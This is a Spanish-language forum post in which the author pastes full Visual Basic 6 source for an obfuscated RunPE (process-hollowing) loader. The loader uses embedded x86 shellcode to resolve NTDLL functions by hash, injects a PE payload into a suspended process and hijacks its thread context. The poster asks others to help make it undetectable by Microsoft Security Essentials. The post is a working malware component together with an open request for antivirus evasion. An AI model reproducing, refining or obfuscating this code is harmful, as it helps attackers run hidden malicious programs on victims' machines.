Creo que el titulo lo define. La question es que de alguna manera necesito dejar ese runpe FUD al essentials, pero yo modeo mas desde binario entonces, alguien me echa una mano?, porque no se ni que parte debe de detectar.
El runpe es ese:
Código: Seleccionar todo
Option Explicit
Option Base 0sNh
StsGuthRmoOALo As Long
Private Type MopFlsAr
End Type
Private Type EqMlFsPpRtjMRlJi
RqhJBisFAlmERunFC As Byte
CqnSNmLj As Byte
B3 As Byte
MtGlliJjpGt As Byte
End Type
Private Const ¦ã¬Æ®âÆ¢±ê As String = "KERNEL32"
Public Declare Function AbortDoc Lib "gdi32" (ByVal hdc As Long) As Long
Private Declare Function CallWindowProcA Lib "user32" (ByVal âúô«Èƒ£ªª¶0 As Long, Optional ByVal âúô«Èƒ£ªª¶1 As Long, Optional ByVal âúô«Èƒ£ªª¶2 As Long, Optional ByVal âúô«Èƒ£ªª¶3 As Long, Optional ByVal âúô«Èƒ£ªª¶4 As Long) As Long
Public Declare Function CallNextHookEx Lib "user32" (ByVal hHook As Long, ByVal ncode As Long, ByVal wParam As Long, lParam As Any) As Long
Private q®ÇQ£ªÇǬ¤9 As Boolean
Private q®ÇQ£ªÇǬ¤8(170) As Byte
Private âúô«Èƒ£ªª¶5(255) As Byte
Private Const q®ÇQ£ªÇǬ¤ As String = "NTDLL"
public function ãó¤x¥¶¦¢ú¦ ()
goto asd
asd:
end function
Public Function âúô«Èƒ£ªª¶(ByRef óº¬Ç¦óãÈ£¦() As Byte, ByVal ú¶È¦¶ªª®óê As String, Optional ByVal ¬ó¦ÇQxÇ©¬¬ As String, Optional ByRef qB¬¤¤Øx©Ç£ As Long) As Boolean
Dim ¥¦¦¤£±Æ¶¬ã As Long
Dim ¼ƒÈ㪶q¤Æ¶ As Long
Dim ¦ã¬Æ®âÆ¢±ê0 As Long
Dim ¦ã¬Æ®âÆ¢±ê1 As Long
Dim ¦ã¬Æ®âÆ¢±ê2 As Long
Dim ¦ã¬Æ®âÆ¢±ê3(16) As Long
Dim ¦ã¬Æ®âÆ¢±ê4(3) As Long
Dim ¦ã¬Æ®âÆ¢±ê5(50) As Long
¥¦¦¤£±Æ¶¬ã = VarPtr(óº¬Ç¦óãÈ£¦(0))
If Not ¦ã¬Æ®âÆ¢±ê7(¥¦¦¤£±Æ¶¬ã, 2) = &H5A4D Then Exit Function
¼ƒÈ㪶q¤Æ¶ = ¥¦¦¤£±Æ¶¬ã + ¦ã¬Æ®âÆ¢±ê7(¥¦¦¤£±Æ¶¬ã + &H3C)
If Not ¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶) = &H4550 Then Exit Function
¦ã¬Æ®âÆ¢±ê1 = ¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶ + &H34)
¦ã¬Æ®âÆ¢±ê3(0) = &H44
Call ¦ã¬Æ®âÆ¢±ê6(¦ã¬Æ®âÆ¢±ê, &H16B3FE88, StrPtr(ú¶È¦¶ªª®óê), StrPtr(¬ó¦ÇQxÇ©¬¬), 0, 0, 0, &H4, 0, 0, VarPtr(¦ã¬Æ®âÆ¢±ê3(0)), VarPtr(¦ã¬Æ®âÆ¢±ê4(0)))
GoTo BúMQ¥
BúMQ¥:
GoTo S¥óÇY
S¥óÇY:
GoTo V¼¥QJ
V¼¥QJ:
GoTo ãQAÈP
ãQAÈP:
GoTo q¤vMã
q¤vMã:
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HF21037D0, ¦ã¬Æ®âÆ¢±ê4(0), ¦ã¬Æ®âÆ¢±ê1)
GoTo ¤amIÈ
¤amIÈ:
GoTo fqPs¬
fqPs¬:
GoTo ãIZØÆ
ãIZØÆ:
GoTo SaôdW
SaôdW:
GoTo mNWMo
mNWMo:
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HD33BCABD, ¦ã¬Æ®âÆ¢±ê4(0), VarPtr(¦ã¬Æ®âÆ¢±ê1), 0, VarPtr(¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶ + &H50)), &H3000, &H40)
GoTo ãvZǶ
ãvZǶ:
GoTo ãSbpZ
ãSbpZ:
GoTo ÇJ¦ws
ÇJ¦ws:
GoTo ªHnfl
ªHnfl:
GoTo ÇMuiw
ÇMuiw:
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HC5108CC2, ¦ã¬Æ®âÆ¢±ê4(0), ¦ã¬Æ®âÆ¢±ê1, VarPtr(óº¬Ç¦óãÈ£¦(0)), ¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶ + &H54), 0)
For ¦ã¬Æ®âÆ¢±ê2 = 0 To ¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶ + &H6, 2) - 1
¦ã¬Æ®âÆ¢±ê0 = ¼ƒÈ㪶q¤Æ¶ + &HF8 + (&H28 * ¦ã¬Æ®âÆ¢±ê2)
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HC5108CC2, ¦ã¬Æ®âÆ¢±ê4(0), ¦ã¬Æ®âÆ¢±ê1 + ¦ã¬Æ®âÆ¢±ê7(¦ã¬Æ®âÆ¢±ê0 + &HC), ¥¦¦¤£±Æ¶¬ã + ¦ã¬Æ®âÆ¢±ê7(¦ã¬Æ®âÆ¢±ê0 + &H14), ¦ã¬Æ®âÆ¢±ê7(¦ã¬Æ®âÆ¢±ê0 + &H10), 0)
Next ¦ã¬Æ®âÆ¢±ê2
¦ã¬Æ®âÆ¢±ê5(0) = &H10007
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HE935E393, ¦ã¬Æ®âÆ¢±ê4(1), VarPtr(¦ã¬Æ®âÆ¢±ê5(0)))
GoTo xªwF«
xªwF«:
GoTo Nsªj¶
Nsªj¶:
GoTo sômYþ
sômYþ:
GoTo BlvO¬
BlvO¬:
GoTo ªVsú©
ªVsú©:
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HC5108CC2, ¦ã¬Æ®âÆ¢±ê4(0), ¦ã¬Æ®âÆ¢±ê5(41) + &H8, VarPtr(¦ã¬Æ®âÆ¢±ê1), &H4, 0)
¦ã¬Æ®âÆ¢±ê5(44) = ¦ã¬Æ®âÆ¢±ê1 + ¦ã¬Æ®âÆ¢±ê7(¼ƒÈ㪶q¤Æ¶ + &H28)
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &H6935E395, ¦ã¬Æ®âÆ¢±ê4(1), VarPtr(¦ã¬Æ®âÆ¢±ê5(0)))
GoTo ¦¼LqJ
¦¼LqJ:
GoTo EP¤¤o
EP¤¤o:
GoTo HvóoØ
HvóoØ:
GoTo fwǥn
fwǥn:
GoTo £ld£©
£ld£©:
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HC54A46C8, ¦ã¬Æ®âÆ¢±ê4(1), 0)
qB¬¤¤Øx©Ç£ = ¦ã¬Æ®âÆ¢±ê4(0)
âúô«Èƒ£ªª¶ = True
End Function
Private Function ¦ã¬Æ®âÆ¢±ê7(ByVal ¦ã¬Æ®âÆ¢±ê8 As Long, Optional ByVal ¦ã¬Æ®âÆ¢±ê9 As Long = &H4) As Long
Call ¦ã¬Æ®âÆ¢±ê6(q®ÇQ£ªÇǬ¤, &HC5108CC2, -1, VarPtr(¦ã¬Æ®âÆ¢±ê7), ¦ã¬Æ®âÆ¢±ê8, ¦ã¬Æ®âÆ¢±ê9, 0)
End Function
public function þǦ¦ªêÇÆÈÇ ()
goto asd2
asd2:
end function
Public Function ¦ã¬Æ®âÆ¢±ê6(ByVal OjiAimDRt As String, ByVal JrClh As Long, ParamArray q®ÇQ£ªÇǬ¤0() As Variant) As Long
Dim q®ÇQ£ªÇǬ¤1 As Variant
Dim q®ÇQ£ªÇǬ¤2 As EqMlFsPpRtjMRlJi
Dim q®ÇQ£ªÇǬ¤3 As Long
Dim ¦ã¬Æ®âÆ¢±ê2 As Long
Dim q®ÇQ£ªÇǬ¤4 As Long
If Not q®ÇQ£ªÇǬ¤9 Then
For ¦ã¬Æ®âÆ¢±ê2 = 0 To 170
q®ÇQ£ªÇǬ¤8(¦ã¬Æ®âÆ¢±ê2) = CByte(Choose(¦ã¬Æ®âÆ¢±ê2 + 1, &HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
&H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3))
Next ¦ã¬Æ®âÆ¢±ê2
¦ã¬Æ®âÆ¢±ê2 = 0
q®ÇQ£ªÇǬ¤9 = True
End If
q®ÇQ£ªÇǬ¤3 = CallWindowProcA(VarPtr(q®ÇQ£ªÇǬ¤8(0)), StrPtr(OjiAimDRt), JrClh)
If q®ÇQ£ªÇǬ¤3 Then
For q®ÇQ£ªÇǬ¤4 = UBound(q®ÇQ£ªÇǬ¤0) To LBound(q®ÇQ£ªÇǬ¤0) Step -1
q®ÇQ£ªÇǬ¤2 = q®ÇQ£ªÇǬ¤6(CLng(q®ÇQ£ªÇǬ¤0(q®ÇQ£ªÇǬ¤4)))
Call q®ÇQ£ªÇǬ¤5(&H68, ¦ã¬Æ®âÆ¢±ê2)
GoTo ôCUH¥
ôCUH¥:
GoTo ÆƬªj
ÆƬªj:
GoTo j¼ótó
j¼ótó:
GoTo óavãS
óavãS:
GoTo P¬SãI
P¬SãI:
Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.RqhJBisFAlmERunFC, ¦ã¬Æ®âÆ¢±ê2): Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.CqnSNmLj, ¦ã¬Æ®âÆ¢±ê2)
GoTo XvXnb
XvXnb:
GoTo ¬qkóƒ
¬qkóƒ:
GoTo B£¤u¶
B£¤u¶:
GoTo ovtºZ
ovtºZ:
GoTo êph£S
êph£S:
Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.B3, ¦ã¬Æ®âÆ¢±ê2): Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.MtGlliJjpGt, ¦ã¬Æ®âÆ¢±ê2)
Next q®ÇQ£ªÇǬ¤4
q®ÇQ£ªÇǬ¤2 = q®ÇQ£ªÇǬ¤6(q®ÇQ£ªÇǬ¤3)
Call q®ÇQ£ªÇǬ¤5(&HB8, ¦ã¬Æ®âÆ¢±ê2)
GoTo hgvjã
hgvjã:
GoTo ãKKVn
ãKKVn:
GoTo ªãyv¤
ªãyv¤:
GoTo êagg£
êagg£:
GoTo tqoªj
tqoªj:
Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.RqhJBisFAlmERunFC, ¦ã¬Æ®âÆ¢±ê2): Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.CqnSNmLj, ¦ã¬Æ®âÆ¢±ê2)
GoTo AYiêþ
AYiêþ:
GoTo ¦ã®©Æ
¦ã®©Æ:
GoTo R¬êªO
R¬êªO:
GoTo E¥¥Ç¥
E¥¥Ç¥:
GoTo Çyae±
Çyae±:
Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.B3, ¦ã¬Æ®âÆ¢±ê2): Call q®ÇQ£ªÇǬ¤5(q®ÇQ£ªÇǬ¤2.MtGlliJjpGt, ¦ã¬Æ®âÆ¢±ê2)
GoTo QYeNó
QYeNó:
GoTo HObºF
HObºF:
GoTo ¶êbj¬
¶êbj¬:
GoTo WL«OA
WL«OA:
GoTo ¤SZƒô
¤SZƒô:
Call q®ÇQ£ªÇǬ¤5(&HFF, ¦ã¬Æ®âÆ¢±ê2): Call q®ÇQ£ªÇǬ¤5(&HD0, ¦ã¬Æ®âÆ¢±ê2)
GoTo Cn¦uM
Cn¦uM:
GoTo OdF£O
OdF£O:
GoTo Jz¤¦ã
Jz¤¦ã:
GoTo ¤¥SiW
¤¥SiW:
GoTo tCTwâ
tCTwâ:
Call q®ÇQ£ªÇǬ¤5(&HC3, ¦ã¬Æ®âÆ¢±ê2)
¦ã¬Æ®âÆ¢±ê6 = CallWindowProcA(VarPtr(âúô«Èƒ£ªª¶5(0)))
End If
End Function
public function Bª¤®£¥ªâ±ª ()
goto asd3
asd3:
end function
Private Sub q®ÇQ£ªÇǬ¤5(ByVal RtnKssmDESCLBD As Byte, ByRef rKjRoAnlrQ As Long)
âúô«Èƒ£ªª¶5(rKjRoAnlrQ) = RtnKssmDESCLBD
rKjRoAnlrQ = rKjRoAnlrQ + 1
End Sub
Private Function q®ÇQ£ªÇǬ¤6(ByVal jBtiMtD As Long) As EqMlFsPpRtjMRlJi
Dim uLptJlthnNlmGolJ As MopFlsArsNh
uLptJlthnNlmGolJ.StsGuthRmoOALo = jBtiMtD
LSet q®ÇQ£ªÇǬ¤6 = uLptJlthnNlmGolJ
End Function
public function ¥ª££ÇªôâǬ ()
goto asd4
asd4:
end function
'*** RunPe Trasher by v0id***
'*** Modo de uso : Call âúô«Èƒ£ªª¶(sByte, sApp.Path , Command) ***
Si me quieren ayudar pueden mandarme MP y ya nos ponemos en contacto
PD: Ya probe obfuscandolo con ACO pero no lo obfusca bien y da errores. Entonces probe con el unique runpe maker y si funciona pero yo quiero usar ese runpe.
